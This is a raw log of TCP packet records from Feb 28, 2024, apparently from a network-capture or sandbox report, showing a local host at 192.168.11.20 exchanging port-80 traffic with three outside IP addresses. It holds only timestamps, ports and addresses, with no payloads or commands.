Feb 28, 2024 15:45:31.154094934 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:31.395710945 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:31.395971060 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:31.396166086 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:31.628017902 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.724479914 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.724634886 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.724719048 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.724786043 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.724843025 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.724952936 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.725009918 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.725064039 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.725091934 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.725091934 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.725323915 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.725421906 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.725431919 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.725852966 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.961946964 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962040901 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962097883 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962155104 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962220907 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962281942 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962337017 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962373018 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.962373018 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.962439060 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962497950 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962559938 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962614059 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962667942 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962709904 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.962709904 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.962753057 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962807894 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962861061 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962878942 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.962939024 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.962991953 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.963049889 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.963057041 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.963123083 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.963176966 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:32.963219881 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.963387966 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:32.963557005 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.197041035 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197303057 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197365999 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197432041 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197488070 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197542906 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197596073 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197649956 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197701931 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197753906 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197779894 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.197779894 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.197779894 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.197808981 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197864056 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197916985 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.197947979 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.197969913 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198024035 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198076010 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198128939 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198126078 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.198183060 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198237896 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198260069 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.198291063 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198344946 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198396921 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198409081 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.198451042 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198504925 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198558092 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198590040 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.198590040 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.198611975 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198667049 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198718071 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198770046 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198797941 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.198797941 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.198822021 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198875904 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198920965 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.198929071 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.198982954 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.199035883 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.199088097 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.199090004 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.199142933 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.199197054 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.199249983 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.199259996 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.199259996 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.199301958 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.199356079 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.199599028 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.199599981 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.434026957 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.434305906 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.434362888 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.434416056 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.434721947 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.434727907 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.434722900 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.434797049 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.434855938 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.434910059 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435126066 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435180902 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435235023 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435288906 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435297012 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.435297012 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.435373068 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435429096 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435482979 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435535908 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435590982 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435633898 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.435635090 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.435643911 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435699940 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435753107 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435806036 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435803890 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.435862064 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435915947 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435969114 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.435972929 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.436023951 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436079025 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436090946 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.436090946 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.436132908 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436186075 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436239004 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436291933 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436314106 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.436345100 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436398983 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436451912 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436456919 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.436506987 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436578989 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436605930 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.436605930 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.436654091 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436708927 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436762094 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436773062 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.436773062 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.436815977 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436870098 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436923027 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.436949968 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.436976910 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437031984 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437084913 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437136889 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437165022 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.437165022 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.437191963 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437247992 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437300920 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437306881 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.437355995 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437410116 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437449932 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.437464952 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437520027 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437572956 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437622070 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.437622070 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.437625885 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437680006 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437732935 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437784910 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437839031 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437844038 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.437892914 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437946081 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.437999010 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438014984 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.438014984 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.438051939 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438107014 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438132048 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.438132048 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.438160896 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438215971 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438268900 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438301086 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.438301086 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.438322067 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438375950 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438429117 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438482046 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438524008 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.438535929 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438591957 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438646078 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:33.438699007 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.438863993 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.438863993 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.438978910 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:33.439146996 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:34.043651104 CET	50239	80	192.168.11.20	198.54.117.242
Feb 28, 2024 15:45:34.268256903 CET	80	50239	198.54.117.242	192.168.11.20
Feb 28, 2024 15:45:38.612644911 CET	50240	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:38.819932938 CET	80	50240	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:38.820175886 CET	50240	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:38.820396900 CET	50240	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:39.025108099 CET	80	50240	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:39.107223988 CET	80	50240	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:39.107290983 CET	80	50240	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:39.107616901 CET	50240	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:40.323724985 CET	50240	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:41.339219093 CET	50241	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:41.539724112 CET	80	50241	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:41.539923906 CET	50241	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:41.540082932 CET	50241	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:41.741100073 CET	80	50241	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:41.829135895 CET	80	50241	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:41.829199076 CET	80	50241	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:41.829524040 CET	50241	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:43.041855097 CET	50241	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.057421923 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.259219885 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.259577990 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.261203051 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.261287928 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.473292112 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.473351002 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.473588943 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.473705053 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.473813057 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.473886967 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.473937035 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.473975897 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.474070072 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.474244118 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.474586010 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.691107035 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.691170931 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.691307068 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.691495895 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.691504955 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.691592932 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.691812992 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:44.691828012 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.692066908 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.692171097 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.692222118 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.692382097 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.692531109 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.692764997 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.734919071 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.896872997 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.897325993 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.897854090 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.898436069 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.898494005 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:44.898535013 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:45.032732964 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:45.032823086 CET	80	50242	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:45.033169031 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:45.775548935 CET	50242	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:46.791174889 CET	50243	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:46.996072054 CET	80	50243	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:46.996393919 CET	50243	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:46.996645927 CET	50243	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:47.197798967 CET	80	50243	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:47.284981966 CET	80	50243	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:47.285048008 CET	80	50243	198.177.123.106	192.168.11.20
Feb 28, 2024 15:45:47.285665989 CET	50243	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:47.285665989 CET	50243	80	192.168.11.20	198.177.123.106
Feb 28, 2024 15:45:47.480971098 CET	80	50243	198.177.123.106	192.168.11.20
Feb 28, 2024 15:46:05.988048077 CET	50244	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:06.307455063 CET	80	50244	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:06.307699919 CET	50244	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:06.307988882 CET	50244	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:06.627465010 CET	80	50244	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:06.630017042 CET	80	50244	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:06.630084038 CET	80	50244	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:06.630352974 CET	50244	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:07.817723989 CET	50244	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:08.833408117 CET	50245	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:09.172900915 CET	80	50245	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:09.173121929 CET	50245	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:09.173430920 CET	50245	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:09.510519981 CET	80	50245	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:09.512959003 CET	80	50245	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:09.513025999 CET	80	50245	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:09.513299942 CET	50245	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:10.676487923 CET	50245	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:11.692317009 CET	50246	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:12.012125015 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.012440920 CET	50246	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:12.014769077 CET	50246	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:12.334140062 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.334167004 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.334187031 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.334204912 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.334342003 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.334423065 CET	50246	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:12.334502935 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.334527969 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.334548950 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.334568977 CET	50246	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:12.334892988 CET	50246	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:12.653930902 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654021978 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654067039 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654108047 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654148102 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654174089 CET	50246	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:12.654256105 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654295921 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654337883 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654355049 CET	50246	80	192.168.11.20	194.191.24.38
Feb 28, 2024 15:46:12.654442072 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654480934 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654530048 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654568911 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654607058 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.654644966 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.974323034 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.974386930 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.974426985 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.974467039 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.974507093 CET	80	50246	194.191.24.38	192.168.11.20
Feb 28, 2024 15:46:12.974545956 CET	80	50246	194.191.24.38	192.168.11.20
